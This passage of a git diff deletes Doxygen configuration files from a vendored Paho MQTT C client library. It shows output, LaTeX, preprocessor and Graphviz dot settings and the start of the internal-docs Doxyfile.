-# The path specified is relative to the HTML output folder.
-
-QCH_FILE               =
-
-# The QHP_NAMESPACE tag specifies the namespace to use when generating
-# Qt Help Project output. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#namespace
-
-QHP_NAMESPACE          = org.doxygen.Project
-
-# The QHP_VIRTUAL_FOLDER tag specifies the namespace to use when generating
-# Qt Help Project output. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#virtual-folders
-
-QHP_VIRTUAL_FOLDER     = doc
-
-# If QHP_CUST_FILTER_NAME is set, it specifies the name of a custom filter to
-# add. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#custom-filters
-
-QHP_CUST_FILTER_NAME   =
-
-# The QHP_CUST_FILT_ATTRS tag specifies the list of the attributes of the
-# custom filter to add. For more information please see
-# <a href="http://doc.trolltech.com/qthelpproject.html#custom-filters">
-# Qt Help Project / Custom Filters</a>.
-
-QHP_CUST_FILTER_ATTRS  =
-
-# The QHP_SECT_FILTER_ATTRS tag specifies the list of the attributes this
-# project's
-# filter section matches.
-# <a href="http://doc.trolltech.com/qthelpproject.html#filter-attributes">
-# Qt Help Project / Filter Attributes</a>.
-
-QHP_SECT_FILTER_ATTRS  =
-
-# If the GENERATE_QHP tag is set to YES, the QHG_LOCATION tag can
-# be used to specify the location of Qt's qhelpgenerator.
-# If non-empty doxygen will try to run qhelpgenerator on the generated
-# .qhp file.
-
-QHG_LOCATION           =
-
-# If the GENERATE_ECLIPSEHELP tag is set to YES, additional index files
-#  will be generated, which together with the HTML files, form an Eclipse help
-# plugin. To install this plugin and make it available under the help contents
-# menu in Eclipse, the contents of the directory containing the HTML and XML
-# files needs to be copied into the plugins directory of eclipse. The name of
-# the directory within the plugins directory should be the same as
-# the ECLIPSE_DOC_ID value. After copying Eclipse needs to be restarted before
-# the help appears.
-
-GENERATE_ECLIPSEHELP   = NO
-
-# A unique identifier for the eclipse help plugin. When installing the plugin
-# the directory name containing the HTML and XML files should also have
-# this name.
-
-ECLIPSE_DOC_ID         = org.doxygen.Project
-
-# The DISABLE_INDEX tag can be used to turn on/off the condensed index (tabs)
-# at top of each HTML page. The value NO (the default) enables the index and
-# the value YES disables it. Since the tabs have the same information as the
-# navigation tree you can set this option to NO if you already set
-# GENERATE_TREEVIEW to YES.
-
-DISABLE_INDEX          = NO
-
-# The GENERATE_TREEVIEW tag is used to specify whether a tree-like index
-# structure should be generated to display hierarchical information.
-# If the tag value is set to YES, a side panel will be generated
-# containing a tree-like index structure (just like the one that
-# is generated for HTML Help). For this to work a browser that supports
-# JavaScript, DHTML, CSS and frames is required (i.e. any modern browser).
-# Windows users are probably better off using the HTML help feature.
-# Since the tree basically has the same information as the tab index you
-# could consider to set DISABLE_INDEX to NO when enabling this option.
-
-GENERATE_TREEVIEW      = NONE
-
-# The ENUM_VALUES_PER_LINE tag can be used to set the number of enum values
-# (range [0,1..20]) that doxygen will group on one line in the generated HTML
-# documentation. Note that a value of 0 will completely suppress the enum
-# values from appearing in the overview section.
-
-ENUM_VALUES_PER_LINE   = 4
-
-# If the treeview is enabled (see GENERATE_TREEVIEW) then this tag can be
-# used to set the initial width (in pixels) of the frame in which the tree
-# is shown.
-
-TREEVIEW_WIDTH         = 250
-
-# When the EXT_LINKS_IN_WINDOW option is set to YES doxygen will open
-# links to external symbols imported via tag files in a separate window.
-
-EXT_LINKS_IN_WINDOW    = NO
-
-# Use this tag to change the font size of Latex formulas included
-# as images in the HTML documentation. The default is 10. Note that
-# when you change the font size after a successful doxygen run you need
-# to manually remove any form_*.png images from the HTML output directory
-# to force them to be regenerated.
-
-FORMULA_FONTSIZE       = 10
-
-# Use the FORMULA_TRANPARENT tag to determine whether or not the images
-# generated for formulas are transparent PNGs. Transparent PNGs are
-# not supported properly for IE 6.0, but are supported on all modern browsers.
-# Note that when changing this option you need to delete any form_*.png files
-# in the HTML output before the changes have effect.
-
-FORMULA_TRANSPARENT    = YES
-
-# Enable the USE_MATHJAX option to render LaTeX formulas using MathJax
-# (see http://www.mathjax.org) which uses client side Javascript for the
-# rendering instead of using prerendered bitmaps. Use this if you do not
-# have LaTeX installed or if you want to formulas look prettier in the HTML
-# output. When enabled you may also need to install MathJax separately and
-# configure the path to it using the MATHJAX_RELPATH option.
-
-USE_MATHJAX            = NO
-
-# When MathJax is enabled you need to specify the location relative to the
-# HTML output directory using the MATHJAX_RELPATH option. The destination
-# directory should contain the MathJax.js script. For instance, if the mathjax
-# directory is located at the same level as the HTML output directory, then
-# MATHJAX_RELPATH should be ../mathjax. The default value points to
-# the MathJax Content Delivery Network so you can quickly see the result without
-# installing MathJax.
-# However, it is strongly recommended to install a local
-# copy of MathJax from http://www.mathjax.org before deployment.
-
-MATHJAX_RELPATH        = http://cdn.mathjax.org/mathjax/latest
-
-# The MATHJAX_EXTENSIONS tag can be used to specify one or MathJax extension
-# names that should be enabled during MathJax rendering.
-
-MATHJAX_EXTENSIONS     =
-
-# When the SEARCHENGINE tag is enabled doxygen will generate a search box
-# for the HTML output. The underlying search engine uses javascript
-# and DHTML and should work on any modern browser. Note that when using
-# HTML help (GENERATE_HTMLHELP), Qt help (GENERATE_QHP), or docsets
-# (GENERATE_DOCSET) there is already a search function so this one should
-# typically be disabled. For large projects the javascript based search engine
-# can be slow, then enabling SERVER_BASED_SEARCH may provide a better solution.
-
-SEARCHENGINE           = YES
-
-# When the SERVER_BASED_SEARCH tag is enabled the search engine will be
-# implemented using a PHP enabled web server instead of at the web client
-# using Javascript. Doxygen will generate the search PHP script and index
-# file to put on the web server. The advantage of the server
-# based approach is that it scales better to large projects and allows
-# full text search. The disadvantages are that it is more difficult to setup
-# and does not have live searching capabilities.
-
-SERVER_BASED_SEARCH    = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the LaTeX output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_LATEX tag is set to YES (the default) Doxygen will
-# generate Latex output.
-
-GENERATE_LATEX         = NO
-
-# The LATEX_OUTPUT tag is used to specify where the LaTeX docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `latex' will be used as the default path.
-
-LATEX_OUTPUT           = latex
-
-# The LATEX_CMD_NAME tag can be used to specify the LaTeX command name to be
-# invoked. If left blank `latex' will be used as the default command name.
-# Note that when enabling USE_PDFLATEX this option is only used for
-# generating bitmaps for formulas in the HTML output, but not in the
-# Makefile that is written to the output directory.
-
-LATEX_CMD_NAME         = latex
-
-# The MAKEINDEX_CMD_NAME tag can be used to specify the command name to
-# generate index for LaTeX. If left blank `makeindex' will be used as the
-# default command name.
-
-MAKEINDEX_CMD_NAME     = makeindex
-
-# If the COMPACT_LATEX tag is set to YES Doxygen generates more compact
-# LaTeX documents. This may be useful for small projects and may help to
-# save some trees in general.
-
-COMPACT_LATEX          = NO
-
-# The PAPER_TYPE tag can be used to set the paper type that is used
-# by the printer. Possible values are: a4, letter, legal and
-# executive. If left blank a4wide will be used.
-
-PAPER_TYPE             = a4wide
-
-# The EXTRA_PACKAGES tag can be to specify one or more names of LaTeX
-# packages that should be included in the LaTeX output.
-
-EXTRA_PACKAGES         =
-
-# The LATEX_HEADER tag can be used to specify a personal LaTeX header for
-# the generated latex document. The header should contain everything until
-# the first chapter. If it is left blank doxygen will generate a
-# standard header. Notice: only use this tag if you know what you are doing!
-
-LATEX_HEADER           =
-
-# The LATEX_FOOTER tag can be used to specify a personal LaTeX footer for
-# the generated latex document. The footer should contain everything after
-# the last chapter. If it is left blank doxygen will generate a
-# standard footer. Notice: only use this tag if you know what you are doing!
-
-LATEX_FOOTER           =
-
-# If the PDF_HYPERLINKS tag is set to YES, the LaTeX that is generated
-# is prepared for conversion to pdf (using ps2pdf). The pdf file will
-# contain links (just like the HTML output) instead of page references
-# This makes the output suitable for online browsing using a pdf viewer.
-
-PDF_HYPERLINKS         = YES
-
-# If the USE_PDFLATEX tag is set to YES, pdflatex will be used instead of
-# plain latex in the generated Makefile. Set this option to YES to get a
-# higher quality PDF documentation.
-
-USE_PDFLATEX           = YES
-
-# If the LATEX_BATCHMODE tag is set to YES, doxygen will add the \\batchmode.
-# command to the generated LaTeX files. This will instruct LaTeX to keep
-# running if errors occur, instead of asking the user for help.
-# This option is also used when generating formulas in HTML.
-
-LATEX_BATCHMODE        = NO
-
-# If LATEX_HIDE_INDICES is set to YES then doxygen will not
-# include the index chapters (such as File Index, Compound Index, etc.)
-# in the output.
-
-LATEX_HIDE_INDICES     = NO
-
-# If LATEX_SOURCE_CODE is set to YES then doxygen will include
-# source code with syntax highlighting in the LaTeX output.
-# Note that which sources are shown also depends on other settings
-# such as SOURCE_BROWSER.
-
-LATEX_SOURCE_CODE      = NO
-
-# The LATEX_BIB_STYLE tag can be used to specify the style to use for the
-# bibliography, e.g. plainnat, or ieeetr. The default style is "plain". See
-# http://en.wikipedia.org/wiki/BibTeX for more info.
-
-LATEX_BIB_STYLE        = plain
-
-#---------------------------------------------------------------------------
-# configuration options related to the RTF output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_RTF tag is set to YES Doxygen will generate RTF output
-# The RTF output is optimized for Word 97 and may not look very pretty with
-# other RTF readers or editors.
-
-GENERATE_RTF           = NO
-
-# The RTF_OUTPUT tag is used to specify where the RTF docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `rtf' will be used as the default path.
-
-RTF_OUTPUT             = rtf
-
-# If the COMPACT_RTF tag is set to YES Doxygen generates more compact
-# RTF documents. This may be useful for small projects and may help to
-# save some trees in general.
-
-COMPACT_RTF            = NO
-
-# If the RTF_HYPERLINKS tag is set to YES, the RTF that is generated
-# will contain hyperlink fields. The RTF file will
-# contain links (just like the HTML output) instead of page references.
-# This makes the output suitable for online browsing using WORD or other
-# programs which support those fields.
-# Note: wordpad (write) and others do not support links.
-
-RTF_HYPERLINKS         = NO
-
-# Load style sheet definitions from file. Syntax is similar to doxygen's
-# config file, i.e. a series of assignments. You only have to provide
-# replacements, missing definitions are set to their default value.
-
-RTF_STYLESHEET_FILE    =
-
-# Set optional variables used in the generation of an rtf document.
-# Syntax is similar to doxygen's config file.
-
-RTF_EXTENSIONS_FILE    =
-
-#---------------------------------------------------------------------------
-# configuration options related to the man page output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_MAN tag is set to YES (the default) Doxygen will
-# generate man pages
-
-GENERATE_MAN           = NO
-
-# The MAN_OUTPUT tag is used to specify where the man pages will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `man' will be used as the default path.
-
-MAN_OUTPUT             = man
-
-# The MAN_EXTENSION tag determines the extension that is added to
-# the generated man pages (default is the subroutine's section .3)
-
-MAN_EXTENSION          = .3
-
-# If the MAN_LINKS tag is set to YES and Doxygen generates man output,
-# then it will generate one additional man file for each entity
-# documented in the real man page(s). These additional files
-# only source the real man page, but without them the man command
-# would be unable to find the correct page. The default is NO.
-
-MAN_LINKS              = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the XML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_XML tag is set to YES Doxygen will
-# generate an XML file that captures the structure of
-# the code including all documentation.
-
-GENERATE_XML           = NO
-
-# The XML_OUTPUT tag is used to specify where the XML pages will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `xml' will be used as the default path.
-
-XML_OUTPUT             = xml
-
-# The XML_SCHEMA tag can be used to specify an XML schema,
-# which can be used by a validating XML parser to check the
-# syntax of the XML files.
-
-XML_SCHEMA             =
-
-# The XML_DTD tag can be used to specify an XML DTD,
-# which can be used by a validating XML parser to check the
-# syntax of the XML files.
-
-XML_DTD                =
-
-# If the XML_PROGRAMLISTING tag is set to YES Doxygen will
-# dump the program listings (including syntax highlighting
-# and cross-referencing information) to the XML output. Note that
-# enabling this will significantly increase the size of the XML output.
-
-XML_PROGRAMLISTING     = YES
-
-#---------------------------------------------------------------------------
-# configuration options for the AutoGen Definitions output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_AUTOGEN_DEF tag is set to YES Doxygen will
-# generate an AutoGen Definitions (see autogen.sf.net) file
-# that captures the structure of the code including all
-# documentation. Note that this feature is still experimental
-# and incomplete at the moment.
-
-GENERATE_AUTOGEN_DEF   = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the Perl module output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_PERLMOD tag is set to YES Doxygen will
-# generate a Perl module file that captures the structure of
-# the code including all documentation. Note that this
-# feature is still experimental and incomplete at the
-# moment.
-
-GENERATE_PERLMOD       = NO
-
-# If the PERLMOD_LATEX tag is set to YES Doxygen will generate
-# the necessary Makefile rules, Perl scripts and LaTeX code to be able
-# to generate PDF and DVI output from the Perl module output.
-
-PERLMOD_LATEX          = NO
-
-# If the PERLMOD_PRETTY tag is set to YES the Perl module output will be
-# nicely formatted so it can be parsed by a human reader.
-# This is useful
-# if you want to understand what is going on.
-# On the other hand, if this
-# tag is set to NO the size of the Perl module output will be much smaller
-# and Perl will parse it just the same.
-
-PERLMOD_PRETTY         = YES
-
-# The names of the make variables in the generated doxyrules.make file
-# are prefixed with the string contained in PERLMOD_MAKEVAR_PREFIX.
-# This is useful so different doxyrules.make files included by the same
-# Makefile don't overwrite each other's variables.
-
-PERLMOD_MAKEVAR_PREFIX =
-
-#---------------------------------------------------------------------------
-# Configuration options related to the preprocessor
-#---------------------------------------------------------------------------
-
-# If the ENABLE_PREPROCESSING tag is set to YES (the default) Doxygen will
-# evaluate all C-preprocessor directives found in the sources and include
-# files.
-
-ENABLE_PREPROCESSING   = YES
-
-# If the MACRO_EXPANSION tag is set to YES Doxygen will expand all macro
-# names in the source code. If set to NO (the default) only conditional
-# compilation will be performed. Macro expansion can be done in a controlled
-# way by setting EXPAND_ONLY_PREDEF to YES.
-
-MACRO_EXPANSION        = NO
-
-# If the EXPAND_ONLY_PREDEF and MACRO_EXPANSION tags are both set to YES
-# then the macro expansion is limited to the macros specified with the
-# PREDEFINED and EXPAND_AS_DEFINED tags.
-
-EXPAND_ONLY_PREDEF     = NO
-
-# If the SEARCH_INCLUDES tag is set to YES (the default) the includes files
-# pointed to by INCLUDE_PATH will be searched when a #include is found.
-
-SEARCH_INCLUDES        = YES
-
-# The INCLUDE_PATH tag can be used to specify one or more directories that
-# contain include files that are not input files but should be processed by
-# the preprocessor.
-
-INCLUDE_PATH           =
-
-# You can use the INCLUDE_FILE_PATTERNS tag to specify one or more wildcard
-# patterns (like *.h and *.hpp) to filter out the header-files in the
-# directories. If left blank, the patterns specified with FILE_PATTERNS will
-# be used.
-
-INCLUDE_FILE_PATTERNS  =
-
-# The PREDEFINED tag can be used to specify one or more macro names that
-# are defined before the preprocessor is started (similar to the -D option of
-# gcc). The argument of the tag is a list of macros of the form: name
-# or name=definition (no spaces). If the definition and the = are
-# omitted =1 is assumed. To prevent a macro definition from being
-# undefined via #undef or recursively expanded use the := operator
-# instead of the = operator.
-
-PREDEFINED             =
-
-# If the MACRO_EXPANSION and EXPAND_ONLY_PREDEF tags are set to YES then
-# this tag can be used to specify a list of macro names that should be expanded.
-# The macro definition that is found in the sources will be used.
-# Use the PREDEFINED tag if you want to use a different macro definition that
-# overrules the definition found in the source code.
-
-EXPAND_AS_DEFINED      =
-
-# If the SKIP_FUNCTION_MACROS tag is set to YES (the default) then
-# doxygen's preprocessor will remove all references to function-like macros
-# that are alone on a line, have an all uppercase name, and do not end with a
-# semicolon, because these will confuse the parser if not removed.
-
-SKIP_FUNCTION_MACROS   = YES
-
-#---------------------------------------------------------------------------
-# Configuration::additions related to external references
-#---------------------------------------------------------------------------
-
-# The TAGFILES option can be used to specify one or more tagfiles. For each
-# tag file the location of the external documentation should be added. The
-# format of a tag file without this location is as follows:
-#
-# TAGFILES = file1 file2 ...
-# Adding location for the tag files is done as follows:
-#
-# TAGFILES = file1=loc1 "file2 = loc2" ...
-# where "loc1" and "loc2" can be relative or absolute paths
-# or URLs. Note that each tag file must have a unique name (where the name does
-# NOT include the path). If a tag file is not located in the directory in which
-# doxygen is run, you must also specify the path to the tagfile here.
-
-TAGFILES               =
-
-# When a file name is specified after GENERATE_TAGFILE, doxygen will create
-# a tag file that is based on the input files it reads.
-
-GENERATE_TAGFILE       =
-
-# If the ALLEXTERNALS tag is set to YES all external classes will be listed
-# in the class index. If set to NO only the inherited external classes
-# will be listed.
-
-ALLEXTERNALS           = NO
-
-# If the EXTERNAL_GROUPS tag is set to YES all external groups will be listed
-# in the modules index. If set to NO, only the current project's groups will
-# be listed.
-
-EXTERNAL_GROUPS        = YES
-
-# The PERL_PATH should be the absolute path and name of the perl script
-# interpreter (i.e. the result of `which perl').
-
-PERL_PATH              = /usr/bin/perl
-
-#---------------------------------------------------------------------------
-# Configuration options related to the dot tool
-#---------------------------------------------------------------------------
-
-# If the CLASS_DIAGRAMS tag is set to YES (the default) Doxygen will
-# generate a inheritance diagram (in HTML, RTF and LaTeX) for classes with base
-# or super classes. Setting the tag to NO turns the diagrams off. Note that
-# this option also works with HAVE_DOT disabled, but it is recommended to
-# install and use dot, since it yields more powerful graphs.
-
-CLASS_DIAGRAMS         = NO
-
-# You can define message sequence charts within doxygen comments using the \msc
-# command. Doxygen will then run the mscgen tool (see
-# http://www.mcternan.me.uk/mscgen/) to produce the chart and insert it in the
-# documentation. The MSCGEN_PATH tag allows you to specify the directory where
-# the mscgen tool resides. If left empty the tool is assumed to be found in the
-# default search path.
-
-MSCGEN_PATH            =
-
-# If set to YES, the inheritance and collaboration graphs will hide
-# inheritance and usage relations if the target is undocumented
-# or is not a class.
-
-HIDE_UNDOC_RELATIONS   = YES
-
-# If you set the HAVE_DOT tag to YES then doxygen will assume the dot tool is
-# available from the path. This tool is part of Graphviz, a graph visualization
-# toolkit from AT&T and Lucent Bell Labs. The other options in this section
-# have no effect if this option is set to NO (the default)
-
-HAVE_DOT               = YES
-
-# The DOT_NUM_THREADS specifies the number of dot invocations doxygen is
-# allowed to run in parallel. When set to 0 (the default) doxygen will
-# base this on the number of processors available in the system. You can set it
-# explicitly to a value larger than 0 to get control over the balance
-# between CPU load and processing speed.
-
-DOT_NUM_THREADS        = 0
-
-# By default doxygen will use the Helvetica font for all dot files that
-# doxygen generates. When you want a differently looking font you can specify
-# the font name using DOT_FONTNAME. You need to make sure dot is able to find
-# the font, which can be done by putting it in a standard location or by setting
-# the DOTFONTPATH environment variable or by setting DOT_FONTPATH to the
-# directory containing the font.
-
-DOT_FONTNAME           = FreeSans
-
-# The DOT_FONTSIZE tag can be used to set the size of the font of dot graphs.
-# The default size is 10pt.
-
-DOT_FONTSIZE           = 10
-
-# By default doxygen will tell dot to use the Helvetica font.
-# If you specify a different font using DOT_FONTNAME you can use DOT_FONTPATH to
-# set the path where dot can find it.
-
-DOT_FONTPATH           =
-
-# If the CLASS_GRAPH and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for each documented class showing the direct and
-# indirect inheritance relations. Setting this tag to YES will force the
-# CLASS_DIAGRAMS tag to NO.
-
-CLASS_GRAPH            = NO
-
-# If the COLLABORATION_GRAPH and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for each documented class showing the direct and
-# indirect implementation dependencies (inheritance, containment, and
-# class references variables) of the class with other documented classes.
-
-COLLABORATION_GRAPH    = YES
-
-# If the GROUP_GRAPHS and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for groups, showing the direct groups dependencies
-
-GROUP_GRAPHS           = YES
-
-# If the UML_LOOK tag is set to YES doxygen will generate inheritance and
-# collaboration diagrams in a style similar to the OMG's Unified Modeling
-# Language.
-
-UML_LOOK               = NO
-
-# If the UML_LOOK tag is enabled, the fields and methods are shown inside
-# the class node. If there are many fields or methods and many nodes the
-# graph may become too big to be useful. The UML_LIMIT_NUM_FIELDS
-# threshold limits the number of items for each type to make the size more
-# managable. Set this to 0 for no limit. Note that the threshold may be
-# exceeded by 50% before the limit is enforced.
-
-UML_LIMIT_NUM_FIELDS   = 10
-
-# If set to YES, the inheritance and collaboration graphs will show the
-# relations between templates and their instances.
-
-TEMPLATE_RELATIONS     = NO
-
-# If the ENABLE_PREPROCESSING, SEARCH_INCLUDES, INCLUDE_GRAPH, and HAVE_DOT
-# tags are set to YES then doxygen will generate a graph for each documented
-# file showing the direct and indirect include dependencies of the file with
-# other documented files.
-
-INCLUDE_GRAPH          = YES
-
-# If the ENABLE_PREPROCESSING, SEARCH_INCLUDES, INCLUDED_BY_GRAPH, and
-# HAVE_DOT tags are set to YES then doxygen will generate a graph for each
-# documented header file showing the documented files that directly or
-# indirectly include this file.
-
-INCLUDED_BY_GRAPH      = YES
-
-# If the CALL_GRAPH and HAVE_DOT options are set to YES then
-# doxygen will generate a call dependency graph for every global function
-# or class method. Note that enabling this option will significantly increase
-# the time of a run. So in most cases it will be better to enable call graphs
-# for selected functions only using the \callgraph command.
-
-CALL_GRAPH             = YES
-
-# If the CALLER_GRAPH and HAVE_DOT tags are set to YES then
-# doxygen will generate a caller dependency graph for every global function
-# or class method. Note that enabling this option will significantly increase
-# the time of a run. So in most cases it will be better to enable caller
-# graphs for selected functions only using the \callergraph command.
-
-CALLER_GRAPH           = NO
-
-# If the GRAPHICAL_HIERARCHY and HAVE_DOT tags are set to YES then doxygen
-# will generate a graphical hierarchy of all classes instead of a textual one.
-
-GRAPHICAL_HIERARCHY    = YES
-
-# If the DIRECTORY_GRAPH and HAVE_DOT tags are set to YES
-# then doxygen will show the dependencies a directory has on other directories
-# in a graphical way. The dependency relations are determined by the #include
-# relations between the files in the directories.
-
-DIRECTORY_GRAPH        = YES
-
-# The DOT_IMAGE_FORMAT tag can be used to set the image format of the images
-# generated by dot. Possible values are svg, png, jpg, or gif.
-# If left blank png will be used. If you choose svg you need to set
-# HTML_FILE_EXTENSION to xhtml in order to make the SVG files
-# visible in IE 9+ (other browsers do not have this requirement).
-
-DOT_IMAGE_FORMAT       = png
-
-# If DOT_IMAGE_FORMAT is set to svg, then this option can be set to YES to
-# enable generation of interactive SVG images that allow zooming and panning.
-# Note that this requires a modern browser other than Internet Explorer.
-# Tested and working are Firefox, Chrome, Safari, and Opera. For IE 9+ you
-# need to set HTML_FILE_EXTENSION to xhtml in order to make the SVG files
-# visible. Older versions of IE do not have SVG support.
-
-INTERACTIVE_SVG        = NO
-
-# The tag DOT_PATH can be used to specify the path where the dot tool can be
-# found. If left blank, it is assumed the dot tool can be found in the path.
-
-DOT_PATH               =
-
-# The DOTFILE_DIRS tag can be used to specify one or more directories that
-# contain dot files that are included in the documentation (see the
-# \dotfile command).
-
-DOTFILE_DIRS           =
-
-# The MSCFILE_DIRS tag can be used to specify one or more directories that
-# contain msc files that are included in the documentation (see the
-# \mscfile command).
-
-MSCFILE_DIRS           =
-
-# The DOT_GRAPH_MAX_NODES tag can be used to set the maximum number of
-# nodes that will be shown in the graph. If the number of nodes in a graph
-# becomes larger than this value, doxygen will truncate the graph, which is
-# visualized by representing a node as a red box. Note that doxygen if the
-# number of direct children of the root node in a graph is already larger than
-# DOT_GRAPH_MAX_NODES then the graph will not be shown at all. Also note
-# that the size of a graph can be further restricted by MAX_DOT_GRAPH_DEPTH.
-
-DOT_GRAPH_MAX_NODES    = 50
-
-# The MAX_DOT_GRAPH_DEPTH tag can be used to set the maximum depth of the
-# graphs generated by dot. A depth value of 3 means that only nodes reachable
-# from the root by following a path via at most 3 edges will be shown. Nodes
-# that lay further from the root node will be omitted. Note that setting this
-# option to 1 or 2 may greatly reduce the computation time needed for large
-# code bases. Also note that the size of a graph can be further restricted by
-# DOT_GRAPH_MAX_NODES. Using a depth of 0 means no depth restriction.
-
-MAX_DOT_GRAPH_DEPTH    = 1000
-
-# Set the DOT_TRANSPARENT tag to YES to generate images with a transparent
-# background. This is disabled by default, because dot on Windows does not
-# seem to support this out of the box. Warning: Depending on the platform used,
-# enabling this option may lead to badly anti-aliased labels on the edges of
-# a graph (i.e. they become hard to read).
-
-DOT_TRANSPARENT        = YES
-
-# Set the DOT_MULTI_TARGETS tag to YES allow dot to generate multiple output
-# files in one run (i.e. multiple -o and -T options on the command line). This
-# makes dot run faster, but since only newer versions of dot (>1.8.10)
-# support this, this feature is disabled by default.
-
-DOT_MULTI_TARGETS      = NO
-
-# If the GENERATE_LEGEND tag is set to YES (the default) Doxygen will
-# generate a legend page explaining the meaning of the various boxes and
-# arrows in the dot generated graphs.
-
-GENERATE_LEGEND        = YES
-
-# If the DOT_CLEANUP tag is set to YES (the default) Doxygen will
-# remove the intermediate dot files that are used to generate
-# the various graphs.
-
-DOT_CLEANUP            = YES
diff --git a/thirdparty/paho.mqtt.c/doc/DoxyfileV3ClientInternal.in b/thirdparty/paho.mqtt.c/doc/DoxyfileV3ClientInternal.in
deleted file mode 100644
index 802651a..0000000
--- a/thirdparty/paho.mqtt.c/doc/DoxyfileV3ClientInternal.in
+++ /dev/null
@@ -1,1852 +0,0 @@
-# Doxyfile 1.8.1.2
-
-# This file describes the settings to be used by the documentation system
-# doxygen (www.doxygen.org) for a project.
-#
-# All text after a hash (#) is considered a comment and will be ignored.
-# The format is:
-#       TAG = value [value, ...]
-# For lists items can also be appended using:
-#       TAG += value [value, ...]
-# Values that contain spaces should be placed between quotes (" ").
-
-#---------------------------------------------------------------------------
-# Project related configuration options
-#---------------------------------------------------------------------------
-
-# This tag specifies the encoding used for all characters in the config file
-# that follow. The default is UTF-8 which is also the encoding used for all
-# text before the first occurrence of this tag. Doxygen uses libiconv (or the
-# iconv built into libc) for the transcoding. See
-# http://www.gnu.org/software/libiconv for the list of possible encodings.
-
-DOXYFILE_ENCODING      = UTF-8
-
-# The PROJECT_NAME tag is a single word (or sequence of words) that should
-# identify the project. Note that if you do not use Doxywizard you need
-# to put quotes around the project name if it contains spaces.
-
-PROJECT_NAME           = "MQTT C Client Libraries Internals"
-
-# The PROJECT_NUMBER tag can be used to enter a project or revision number.
-# This could be handy for archiving the generated documentation or
-# if some version control system is used.
-
-PROJECT_NUMBER         =
-
-# Using the PROJECT_BRIEF tag one can provide an optional one line description
-# for a project that appears at the top of each page and should give viewer
-# a quick idea about the purpose of the project. Keep the description short.
-
-PROJECT_BRIEF          =
-
-# With the PROJECT_LOGO tag one can specify an logo or icon that is
-# included in the documentation. The maximum height of the logo should not
-# exceed 55 pixels and the maximum width should not exceed 200 pixels.
-# Doxygen will copy the logo to the output directory.
-
-PROJECT_LOGO           = "@PROJECT_SOURCE_DIR@/doc/pahologo.png"
-
-# The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute)
-# base path where the generated documentation will be put.
-# If a relative path is entered, it will be relative to the location
-# where doxygen was started. If left blank the current directory will be used.
-
-OUTPUT_DIRECTORY       = "@CMAKE_CURRENT_BINARY_DIR@/doc/MQTTClient_internal/"
-
-# If the CREATE_SUBDIRS tag is set to YES, then doxygen will create
-# 4096 sub-directories (in 2 levels) under the output directory of each output
-# format and will distribute the generated files over these directories.
-# Enabling this option can be useful when feeding doxygen a huge amount of
-# source files, where putting all generated files in the same directory would
-# otherwise cause performance problems for the file system.
-
-CREATE_SUBDIRS         = NO
-
-# The OUTPUT_LANGUAGE tag is used to specify the language in which all
-# documentation generated by doxygen is written. Doxygen will use this
-# information to generate all constant output in the proper language.
-# The default language is English, other supported languages are:
-# Afrikaans, Arabic, Brazilian, Catalan, Chinese, Chinese-Traditional,
-# Croatian, Czech, Danish, Dutch, Esperanto, Farsi, Finnish, French, German,
-# Greek, Hungarian, Italian, Japanese, Japanese-en (Japanese with English
-# messages), Korean, Korean-en, Lithuanian, Norwegian, Macedonian, Persian,
-# Polish, Portuguese, Romanian, Russian, Serbian, Serbian-Cyrillic, Slovak,
-# Slovene, Spanish, Swedish, Ukrainian, and Vietnamese.
-
-OUTPUT_LANGUAGE        = English
-
-# If the BRIEF_MEMBER_DESC tag is set to YES (the default) Doxygen will
-# include brief member descriptions after the members that are listed in
-# the file and class documentation (similar to JavaDoc).
-# Set to NO to disable this.
-
-BRIEF_MEMBER_DESC      = YES
-
-# If the REPEAT_BRIEF tag is set to YES (the default) Doxygen will prepend
-# the brief description of a member or function before the detailed description.
-# Note: if both HIDE_UNDOC_MEMBERS and BRIEF_MEMBER_DESC are set to NO, the
-# brief descriptions will be completely suppressed.
-
-REPEAT_BRIEF           = YES
-
-# This tag implements a quasi-intelligent brief description abbreviator
-# that is used to form the text in various listings. Each string
-# in this list, if found as the leading text of the brief description, will be
-# stripped from the text and the result after processing the whole list, is
-# used as the annotated text. Otherwise, the brief description is used as-is.
-# If left blank, the following values are used ("$name" is automatically
-# replaced with the name of the entity): "The $name class" "The $name widget"
-# "The $name file" "is" "provides" "specifies" "contains"
-# "represents" "a" "an" "the"
-
-ABBREVIATE_BRIEF       = "The $name class" \
-                         "The $name widget" \
-                         "The $name file" \
-                         is \
-                         provides \
-                         specifies \
-                         contains \
-                         represents \
-                         a \
-                         an \
-                         the
-
-# If the ALWAYS_DETAILED_SEC and REPEAT_BRIEF tags are both set to YES then
-# Doxygen will generate a detailed section even if there is only a brief
-# description.
-
-ALWAYS_DETAILED_SEC    = NO
-
-# If the INLINE_INHERITED_MEMB tag is set to YES, doxygen will show all
-# inherited members of a class in the documentation of that class as if those
-# members were ordinary class members. Constructors, destructors and assignment
-# operators of the base classes will not be shown.
-
-INLINE_INHERITED_MEMB  = NO
-
-# If the FULL_PATH_NAMES tag is set to YES then Doxygen will prepend the full
-# path before files name in the file list and in the header files. If set
-# to NO the shortest path that makes the file name unique will be used.
-
-FULL_PATH_NAMES        = YES
-
-# If the FULL_PATH_NAMES tag is set to YES then the STRIP_FROM_PATH tag
-# can be used to strip a user-defined part of the path. Stripping is
-# only done if one of the specified strings matches the left-hand part of
-# the path. The tag can be used to show relative paths in the file list.
